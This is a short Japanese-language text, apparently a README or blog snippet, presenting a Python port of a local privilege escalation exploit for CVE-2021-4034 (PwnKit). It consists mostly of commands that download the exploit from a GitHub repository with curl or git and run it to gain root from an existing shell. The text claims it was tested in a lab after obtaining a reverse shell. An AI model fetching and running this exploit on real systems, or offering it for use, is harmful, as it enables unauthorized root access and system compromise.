
これは Python 製のエクスプロイトです。シェルを取得した状態から root への権限昇格を行います。 CVE-2021-4034 の脆弱性、別名 PwnKit を利用して動作します。
curl -fsSL https://raw.githubusercontent.com/ropydev/CVE-2021-4034-PwnKit/main/main.py -o exploit.py
python3 exploit.py
git clone https://github.com/ropydev/CVE-2021-4034-PwnKit.git
cd CVE-2021-4034-PwnKit
python main.py
上記の例は、リバースシェルを取得したラボ環境で実行したもので、このエクスプロイトを実行すると簡単に root へ昇格できます。
このプログラムは、元々 C で書かれたオリジナルプログラムの「翻訳」、つまり Python 版に相当するものです。